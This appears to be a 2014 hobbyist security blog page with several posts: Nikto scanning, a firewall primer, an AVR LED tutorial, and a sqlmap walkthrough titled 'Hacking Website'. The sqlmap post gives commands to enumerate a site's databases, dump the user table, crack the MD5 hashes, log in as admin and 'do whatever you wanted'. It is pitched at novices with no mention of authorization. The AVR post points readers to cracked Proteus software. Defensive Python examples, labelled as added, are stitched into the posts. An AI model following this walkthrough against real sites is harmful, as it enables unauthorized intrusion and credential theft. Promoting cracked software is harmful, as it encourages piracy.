Sunday, May 18, 2014

Website Scanning Through Nikto (in Backtrack 5)

Website Scanning Tutorial Through Nikto

When we talk about scanning a website to find vulnerabilities, we have many tools in Backtrack 5 / Kali Linux that serve this purpose well, and "Nikto" is one of them. These tools are used to measure the security level of web applications.

About Nikto:
  • Nikto is open source.
  • It can check a web server for over 6400 potentially dangerous files/CGIs.
  • It checks for outdated versions of over 1000 servers, and version-specific problems on over 270 servers.
  • It checks for plug-ins and misconfigured files.
  • Fast & effective.
  • It finds default files and programs.
  • It finds insecure files and programs.
Features:

  • Full HTTP proxy support.
  • Apache username enumeration.
  • Logging to Metasploit.
  • Secure Sockets Layer (SSL) support.
  • Sub-domain brute forcing (guessing).
  • Easy to update.
  • Saves reports in multiple formats.

Requirements:
  • Backtrack 5 / Kali Linux with Perl installed in it.

Tutorial:


A basic scan requires a host to scan, which means you need a target website. You can use the website's IP address or just its hostname. Here I have used http://www.mytargetsite.com/ as the example; substitute the website you want to scan.


Open Nikto and run the following commands:

1. To scan a website for vulnerabilities, type:
$ perl nikto.pl -host http://www.mytargetsite.com/
or
$ perl nikto.pl -h http://www.mytargetsite.com/



2. For help:
$ perl nikto.pl -H http://www.mytargetsite.com/

3. If you want to check a different port, use:
$ perl nikto.pl -h http://www.mytargetsite.com/ -p [port number]



4. If you want to run this test through a proxy, use this command:
$ perl nikto.pl -h http://www.mytargetsite.com/ -useproxy http://localhost:8080/

5. To update Nikto, use:
$ perl nikto.pl -update 

6. To search for vulnerabilities across a range of ports (e.g., ports 80 to 100):
$ perl nikto.pl -h http://www.mytargetsite.com/ -port 80-100

7. To save the scan result in a text file for later use:
$ perl nikto.pl -h http://www.mytargetsite.com/ -output ./filename.txt


Note: Nikto scans port 80 by default. If you want to scan a different port, specify it as in step 3.
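A scan like the one above is very noisy on the server side, so here is the view from the other end: an added example (not part of the original post) that reads Apache combined-format access log lines and flags clients that look like a Nikto run, using Nikto's default User-Agent string and the burst of 404/403 responses its thousands of probes produce. The log lines, IP addresses and paths are constructed for this example; the threshold `min_misses` is an assumed tuning value.

```python
import re
from collections import defaultdict

# Constructed sample access log lines (not from the original post). The
# 198.51.100.9 lines carry a Nikto-style User-Agent; hosts and paths are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [18/May/2014:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/29.0"
203.0.113.5 - - [18/May/2014:10:01:03 +0000] "GET /about.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/29.0"
198.51.100.9 - - [18/May/2014:10:02:00 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:Port Check)"
198.51.100.9 - - [18/May/2014:10:02:00 +0000] "GET /cgi-bin/test-cgi HTTP/1.1" 404 210 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000001)"
198.51.100.9 - - [18/May/2014:10:02:01 +0000] "GET /admin/ HTTP/1.1" 404 210 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000002)"
198.51.100.9 - - [18/May/2014:10:02:01 +0000] "GET /phpinfo.php HTTP/1.1" 404 210 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000003)"
198.51.100.9 - - [18/May/2014:10:02:01 +0000] "GET /server-status HTTP/1.1" 403 199 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000004)"
"""

# Apache "combined" log format: ip ident user [ts] "req" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def parse_line(line):
    """Return the fields of one access log line as a dict, or None if unparsable."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect_nikto(log_text, min_misses=3):
    """Return {ip: [reasons]} for clients that look like a Nikto scan.

    Two independent signals: the default Nikto User-Agent, and a run of
    404/403 responses (Nikto probes many paths that normally do not exist).
    min_misses is an assumed threshold; tune it to your site's baseline."""
    ua_hits = defaultdict(int)
    misses = defaultdict(int)
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue  # skip lines that do not match the expected format
        if "nikto" in rec["ua"].lower():
            ua_hits[rec["ip"]] += 1
        if rec["status"] in ("404", "403"):
            misses[rec["ip"]] += 1
    findings = {}
    for ip in set(ua_hits) | set(misses):
        reasons = []
        if ua_hits[ip]:
            reasons.append(f"nikto user-agent x{ua_hits[ip]}")
        if misses[ip] >= min_misses:
            reasons.append(f"{misses[ip]} 404/403 responses")
        if reasons:
            findings[ip] = reasons
    return findings


if __name__ == "__main__":
    for ip, why in detect_nikto(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(why))
```

The User-Agent check only catches a scan run with default settings; the 404/403 burst catches a scan whose User-Agent has been changed, which is why the two signals are reported separately.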

For any query comment below or write us @ prashantsavior@gmail.com

Article by: Unpredictable



                  Monday, May 12, 2014

                  INTRODUCTION TO FIREWALL

                  A basic Introduction to Firewalls

                  Introduction to firewalls 

                  When you use the internet at your college, school or office, you may not be able to access some websites.
                  So do you know how they block those websites? They use firewalls to block them.
                  A firewall protects the system from hacker attacks. It also protects you from various viruses. You can say that it saves your cyber life, but only to some extent, as nothing is absolute.

                  So let's see what this firewall actually is!!!



                  *** The first question that arises in our mind is: What is a Firewall?

                  ---> A firewall works like a security guard standing outside an office. What does the security guard usually do? He allows in those who have an identity card and blocks those who do not.

                  Likewise, the firewall blocks unauthorized access to the system. A firewall may be software or hardware. It works based on a set of rules defined by the administrator. Using a firewall, the administrator can block certain websites from being accessed. All traffic between the inside and the outside of the network must pass through the firewall, and only authorized traffic (according to the rule set) is allowed to pass.

                  *** The second question you must be thinking of is: what are the Types of Firewalls?

                  ---> Here is a basic classification of the types of firewall:
                   (i) Packet Filtering
                   (ii) Application Level Gateway
                   (iii) Circuit Level Gateway

                  (i) Packet Filtering (Network Layer):

                  A packet filtering router applies a set of rules to each incoming IP packet and then forwards or discards the packet. The router is configured so that it can filter both incoming and outgoing packets. Packets are filtered based on the source and destination IP address. An IP spoofing attack is possible against this kind of packet filtering, because IP spoofing is achieved simply by changing the source IP address of the packets.

                  Stateful Inspection Firewalls:

                  A stateful inspection packet filter tightens the rules for TCP traffic by creating a state table of outbound TCP connections. If a packet matches an existing connection in the state table, it is allowed. If it does not match, it is evaluated according to the rule set for new connections.
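To make the state-table logic concrete, here is an added example (not from the original post) that models a stateful packet filter in a few dozen lines: packets belonging to a tracked connection pass without a rule lookup, anything else is treated as a new connection and checked against a small rule set with a default deny. The internal network prefix, the rule set and the packets are all constructed for the example; real firewalls track far more state (sequence numbers, timeouts, UDP pseudo-connections) than this.

```python
from dataclasses import dataclass

# Constructed example, not from the original post: a tiny model of the
# stateful packet filter described above. Rules and packets are made up.


@dataclass(frozen=True)
class Packet:
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    syn: bool  # True for a connection-opening SYN, False for later packets


INSIDE_NET = "10.0.0."  # hypothetical internal network prefix

# Rules consulted for *new* connections only: (direction, dst_port, action).
# Anything not listed is dropped (default deny).
NEW_CONN_RULES = [
    ("outbound", 80, "allow"),   # internal hosts may browse the web
    ("outbound", 443, "allow"),
    ("inbound", 25, "allow"),    # the mail server is reachable from outside
]


class StatefulFilter:
    def __init__(self):
        # state table keyed by the 4-tuple of an allowed connection
        self.state = set()

    @staticmethod
    def direction(pkt):
        return "outbound" if pkt.src_ip.startswith(INSIDE_NET) else "inbound"

    def _in_state_table(self, pkt):
        # a reply travels the same 4-tuple in reverse, so check both orders
        fwd = (pkt.src_ip, pkt.src_port, pkt.dst_ip, pkt.dst_port)
        rev = (pkt.dst_ip, pkt.dst_port, pkt.src_ip, pkt.src_port)
        return fwd in self.state or rev in self.state

    def decide(self, pkt):
        # 1. packets of a tracked connection pass without a rule lookup
        if self._in_state_table(pkt):
            return "allow"
        # 2. everything else is a new connection; a non-SYN packet that
        #    belongs to no known connection is dropped outright
        if not pkt.syn:
            return "drop"
        d = self.direction(pkt)
        for rule_dir, port, action in NEW_CONN_RULES:
            if rule_dir == d and port == pkt.dst_port:
                if action == "allow":
                    # remember the connection so its later packets pass
                    self.state.add((pkt.src_ip, pkt.src_port, pkt.dst_ip, pkt.dst_port))
                return action
        return "drop"  # default deny


def run_demo():
    """Feed a constructed sequence of packets through one filter instance."""
    fw = StatefulFilter()
    return [
        fw.decide(Packet("10.0.0.5", 40000, "93.184.216.34", 80, True)),    # new outbound web request
        fw.decide(Packet("93.184.216.34", 80, "10.0.0.5", 40000, False)),   # reply to it: tracked, allowed
        fw.decide(Packet("198.51.100.7", 5555, "10.0.0.5", 40001, False)),  # unsolicited inbound non-SYN
        fw.decide(Packet("198.51.100.7", 5555, "10.0.0.5", 22, True)),      # inbound SSH attempt: no rule
        fw.decide(Packet("198.51.100.7", 5555, "10.0.0.9", 25, True)),      # inbound SMTP: allowed by rule
    ]


if __name__ == "__main__":
    print(run_demo())  # ['allow', 'allow', 'drop', 'drop', 'allow']
```

The third packet is the case that separates a stateful filter from a stateless one: a stateless filter would have to decide it on addresses alone, whereas here it is dropped because no connection in the table explains it.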

                  (ii) Application Level Gateway:

                  An application level gateway is also known as a proxy server. The user communicates with the gateway at the application layer of the TCP/IP stack. The gateway asks the user for the name of the remote host to be connected to, and when the user enters a valid user ID, the gateway gives access to the remote application. This blocks malicious activity and corrects application behaviour, ensuring the safety of the company. It is more secure than packet filtering, and it is easy to log and audit all incoming traffic at the application level. Application-level filtering may also include protection against spam and viruses, and can block undesirable websites based on their content rather than just their IP address.

                  (iii) Circuit Level Gateway:

                  A circuit level gateway works at the session layer of the OSI model. It monitors the TCP handshake between packets to make sure a session is legitimate, and traffic is filtered based on session rules. Circuit-level firewalls hide the network itself from the outside, which is useful for denying access to intruders, but they do not filter individual packets. This type of firewall is used when the administrator trusts the internal users.


                  *** So, why a Firewall?

                  ---> A firewall blocks unauthorized users and prohibits vulnerable services from entering or leaving the network. It gives protection from IP spoofing and routing attacks, and protection against remote login, Trojan backdoors, session hijacking, cookie stealing, etc.


                  *** So by now you must be haunted by the question: does it have any limitations? If yes, then what are the limitations of firewalls?

                  ---> The firewall cannot protect against attacks that bypass the firewall. The firewall does not protect against internal threats. The firewall cannot protect against the transfer of virus-infected programs or files; it would be impossible for the firewall to scan all incoming files and emails for viruses.


                  Author: Unpredictable

                  For query feel free to write us @ prashantsavior@gmail.com or comment below.
                  And don't forget to like us on Facebook

                  Friday, May 9, 2014

                  Simple LED Project Explained Using ATMEGA 16 (in Proteus)

                  This post is for beginners who want to take their first step towards embedded systems or robotics.
                  Let's start...
                  First get your computer ready before starting...
                  1. Download and install Proteus 8.0 full cracked.
                      Download it from our software section. Click here to download
                  2. Download and install AVR Studio and WinAVR 2010.
                      Download it from our software section. Click here to download

                  Note: While working with Proteus 8.0, it may crash often after running a simulation once, so save your work before simulating. To avoid this, buy the professional version from the developer and support their work; otherwise you have to restart it every time after simulating.

                  Atmega 16 is a micro-controller. To know more about it and its pin configuration Click here

                  After completing the above steps, follow these steps:

                  Working on Proteus:-
                  Step 1: Open Proteus.
                  Step 2: Click on ISIS.

                  Step 3: Click on P to pick components from the library.

                  Step 4: Select the component you want to connect.


                  Step 5: Connect the Pin as per the circuit diagram.


                  Now it's programming time!!! Get ready, programmer!!!

                  Working with AVR Studio:
                  Step 6: Open AVR Studio 4.

                  Step 7: Create a new file and name it.

                  Step 8: Select the microcontroller type as ATMEGA 16.

                  Step 9: Start writing program.

                  Step 10: After writing the program compile it by pressing F7.

                  Note: You should know some programming language to proceed. That will make your task easier.

                  Let's start from the basics.

                  "avr/io.h" : Header file for AVR input/output.
                  "avr/delay.h" or "util/delay.h" : Header file that provides the delay functions.
                  DDRX : Used to set slot A, B, C or D as either input or output, where X = A / B / C / D.
                  PORTX : Used to assign the value of the slot's pins when it is set as output, where X = A / B / C / D.
                  PINX : Used to read the value when the port is set as input.
                  _delay_ms(i) : Used to provide a delay in milliseconds, where i is any integer. Example: _delay_ms(500) provides a delay of 500 milliseconds.

                  Q. How to assign the PORT as input or output?
                  --> Input is always assigned as LOW and output is assigned as HIGH.
                         Example: To assign slots A and B as input we can write PORTA=0x00 or PORTA=0b00000000 or PORTA=0. Similarly for B, we can write PORTB=0x00 or PORTB=0b00000000 or PORTB=0.
                         To assign slots C and D as output we can write PORTC=0xff or PORTC=0b11111111 or PORTC=255. Similarly for D we can write PORTD=0xff or PORTD=0b11111111 or PORTD=255.

                  *** Where 0x denotes hexadecimal, 0b denotes binary, and simply writing the integer means decimal format.

                  Note: You can make any port as input or output. It totally depends on you.

                  Problem Statement 1:
                  Make a simple LED program to blink all LEDs simultaneously with a delay of 500 milliseconds.
                  --> Open AVR Studio and get yourself ready to program.

                  #include <avr/io.h>
                  #define F_CPU 8000000UL     /* clock frequency used by _delay_ms(); 8 MHz is an assumed value, set it to your board's clock */
                  #include <util/delay.h>     /* older toolchains ship this as avr/delay.h */

                  int main(void)
                  {
                      DDRA = 0xff;            /* all PORTA pins as output (the LEDs) */
                      PORTA = 0x00;           /* start with all LEDs off */
                      while (1)
                      {
                          PORTA = 0xff;       /* all LEDs on */
                          _delay_ms(500);
                          PORTA = 0x00;       /* all LEDs off */
                          _delay_ms(500);
                      }
                      return 0;               /* never reached; the loop above runs forever */
                  }

                  Using the program in Proteus:
                  Step 11: Open Proteus and right click on the micro controller and click on edit.


                   Step 12: Select the program file which you have made. Make sure the file extension is .hex.

                  Step 13: Click open and then click ok.
                  Step 14: Click on simulation button shown in the figure.



                  Proteus Crashes:

                  All you can do is close it and start it again. Or better, buy the software if you can save enough bucks from your pocket money.



                  Try more programs with different problem statements, or wait for my next problem statement in my next post. Till then, happy learning. And don't forget to comment if it was really helpful for you.

                  Like us --> Facebook

                  For any query feel free to ask @ prashantsavior@gmail.com

                  Author: Unpredictable
                  Source provided by: Aakash Kumar Das

                  Tuesday, April 29, 2014

                  HACKING WEBSITE (SQLi) USING SQLMAP

                  Today I will introduce you to a very simple tool that will ease your SQL injection procedure. With the help of this tool even a noob can hack a website.

                  About Sqlmap:
                  sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

                  To use this you need to download and install python. 

                  Installing and setting path for python:-
                  Step 1: Download Python from www.python.org
                                (Download Python 2.7)
                  Step 2: Unzip it and install it on your computer.
                  Step 3: Go to Control Panel --> Go to System --> Click on "Edit the system environment variables".

                  Step 4: Then follow the steps shown in the picture. Edit the environment variable to add C:\python27;

                  Step 5: Click OK and restart your laptop.

                  Sqlmap:
                  Step 6: Download sqlmap from www.sqlmap.org.

                  Step 7: Unzip it and save it in the folder of your choice (I have saved it in C:).

                  Step 8: Open cmd by pressing Windows + R, then typing cmd and hitting Enter.

                  Step 9: Go to the folder where sqlmap is stored. 
                  C:> cd sqlmap 

                  Step 10: Run sqlmap. Find a vulnerable URL (how to find one will be discussed in another post; here let the vulnerable URL be www.vulnesite.php?id=23)
                  C:/sqlmap> python sqlmap.py -u www.vulnesite.php?id=23

                  Step 11: Then find the databases of the website.
                  C:/sqlmap> python sqlmap.py -u "www.vulnesite.php?id=23" --dbs 

                  Step 12: Then find the tables and then the columns. (Let the database found be admin)
                  C:/sqlmap> python sqlmap.py -u "www.vulnesite.php?id=23" --tables -D admin
                  (tables found be admin)

                  C:/sqlmap> python sqlmap.py -u "www.vulnesite.php?id=23" --columns -D admin -T user

                  Step 13: Get all the data from the table.
                  C:/sqlmap> python sqlmap.py -u "www.vulnesite.php?id=23" --dump -D admin -T user

                  Step 14: You get the username and password. Now you can find the admin login page and type in the username and the password (if it is an MD5 hash, you need to decode it using one of the various websites). Now log in and do whatever you wanted to do.
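What makes the `id=23` URL above exploitable is the way the application builds its query, so here is an added example (not from the original post and not sqlmap's code) showing the two sides of it in Python with an in-memory SQLite database: a lookup that pastes the `id` parameter into the SQL text, beside the hardened lookup that validates the type and binds the value as a parameter. The `user` table and its rows are constructed for this example, and the password hashes are placeholders.

```python
import sqlite3

# Constructed example, not from the original post or from sqlmap. The table,
# rows and hash placeholders below are made up for the demonstration.


def make_db():
    """Build an in-memory database with a small constructed user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id INTEGER, username TEXT, password_hash TEXT)")
    conn.executemany(
        "INSERT INTO user VALUES (?, ?, ?)",
        [(23, "alice", "<hash-placeholder-1>"),
         (24, "bob", "<hash-placeholder-2>"),
         (25, "admin", "<hash-placeholder-3>")],
    )
    return conn


def lookup_vulnerable(conn, id_param):
    """The pattern sqlmap looks for: the request parameter is concatenated
    into the SQL text, so any SQL syntax inside it is executed as SQL."""
    sql = "SELECT username FROM user WHERE id = " + id_param
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, id_param):
    """Hardened form: reject anything that is not an integer, then bind the
    value as a query parameter so the database never parses it as SQL."""
    try:
        id_value = int(id_param)
    except ValueError:
        return []  # a non-numeric id is simply not a valid request
    rows = conn.execute("SELECT username FROM user WHERE id = ?", (id_value,))
    return [row[0] for row in rows]


def demo():
    """Run both lookups on a normal id and on a boolean-tampered one."""
    conn = make_db()
    normal = "23"
    tampered = "23 OR 1=1"  # the kind of input a boolean-based SQLi check sends
    return {
        "vulnerable_normal": lookup_vulnerable(conn, normal),
        "vulnerable_tampered": lookup_vulnerable(conn, tampered),
        "safe_normal": lookup_safe(conn, normal),
        "safe_tampered": lookup_safe(conn, tampered),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

The vulnerable lookup returns every user for the tampered input, which is exactly the behaviour difference sqlmap's detection engine measures between a normal and a tampered request; the parameterized lookup returns nothing for it, and there is no difference left to detect.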


                  For any query feel free to contact us @ prashantsavior@gmail.com and don't forget to like us on Facebook.



                  Monday, April 28, 2014

                  Learn Python

                  Python is a widely used general-purpose, high-level programming language. Its design philosophy emphasizes code readability, and its syntax allows programmers to express concepts in fewer lines of code than would be possible in languages such as C. The language provides constructs intended to enable clear programs on both a small and large scale.
                  Python supports multiple programming paradigms, including object-oriented, imperative and functional programming or procedural styles. It features a dynamic type system and automatic memory management and has a large and comprehensive standard library.
                  Like other dynamic languages, Python is often used as a scripting language, but is also used in a wide range of non-scripting contexts. Using third-party tools, such as Py2exe or PyInstaller, Python code can be packaged into standalone executable programs. Python interpreters are available for many operating systems.
                  CPython, the reference implementation of Python, is free and open source software and has a community-based development model, as do nearly all of its alternative implementations. CPython is managed by the non-profit Python Software Foundation.

                  Click on the link below to download a bunch of books.

                  Download

                  For more details please feel free to contact us @ prashantsavior@gmail.com

                  Saturday, April 12, 2014

                  HOW TO MAKE NAMELESS FOLDER

                  Have you ever tried making a nameless folder??? I guess if you ever tried by just deleting the default folder name and hitting Enter, the default name simply came back. The same happens if you ever try to make a folder named 'con', etc... This is because there are certain keywords that Windows has reserved for its internal use only. Now the question is: how can we make a nameless folder, or a folder named con...
                  For that, simply follow the given steps...

                  Step 1: Make a folder in the drive where you want to make.
                  Step 2: Right click on the folder and then click on rename.
                  Step 3: Clear the default name by pressing backspace key.
                  Step 4: Switch on your Number lock (by pressing Fn + scroll ).
                  Step 5: Then keep Alt pressed with one finger and with another press k, i, i one after the other (in other words Alt + 255, since k = 2 and i = 5 when Num Lock is switched on).
                  Step 6: Then release all the keys and finally press Enter. Your nameless folder has been created.

                  Alt + 255 actually prints a non-printable character that cannot be seen. Even if you try pressing the spacebar and then Enter, it won't work. I hope all of you have done this successfully.
                  Similarly, to make a folder named con --> simply type con and then follow steps 5 and 6.

                  Author: Unpredictable

                  If you have any query regarding this, feel free to contact us @ prashantsavior@gmail.com or simply comment on the below.

                  Wednesday, April 9, 2014

                  Hacker's Browser

                  OWASP MANTRA JANUS

                  OWASP is a different kind of community, one that develops free applications that can be trusted and used by all. They develop open source software for cyber security.
                  This time they have come up with a browser that has all the capabilities and add-ons pre-installed that every pentester and security geek needs; it would not be odd to say that this browser is the best for hackers as well as for crackers.

                  You can download OWASP Mantra Janus from the link below

                  Click here to Download

                  Or

                  If you want to download it from the official site then go to the link below

                  Click here to proceed


                  About OWASP:
                  It was established as a not-for-profit charitable organization in the United States on April 21, 2004 to ensure the ongoing availability and support for our work at OWASP. OWASP is an international organization and the OWASP Foundation supports OWASP efforts around the world. OWASP is an open community dedicated to enabling organizations to conceive, develop, acquire, operate, and maintain applications that can be trusted. All of the OWASP tools, documents, forums, and chapters are free and open to anyone interested in improving application security. They advocate approaching application security as a people, process, and technology problem because the most effective approaches to application security include improvements in all of these areas.
                  OWASP is a new kind of organization. Our freedom from commercial pressures allows us to provide unbiased, practical, cost-effective information about application security. OWASP is not affiliated with any technology company, although we support the informed use of commercial security technology. Similar to many open-source software projects, OWASP produces many types of materials in a collaborative, open way. The OWASP Foundation is a not-for-profit entity that ensures the project's long-term success.

                  For more visit www.owasp.org